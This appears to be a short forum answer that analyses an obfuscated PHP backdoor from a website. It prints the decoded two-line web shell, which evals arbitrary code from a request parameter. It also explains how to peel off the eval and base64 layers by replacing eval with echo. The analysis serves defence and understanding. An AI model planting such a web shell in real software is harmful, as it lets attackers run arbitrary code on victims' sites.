It's a series of eval+base64 encryption. After decoding, the code would be:
if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));
Here's how I got that:
- Copy the entire code into your text editor
- Supply
\/\*.*?\*\/
as the search pattern, and replace with''
(empty string) - Now you'll get one or more
eval()
stattements. Change that toecho
. - Repeat
Basically this code will allow the attacker to inject and execute arbitrary code on your website.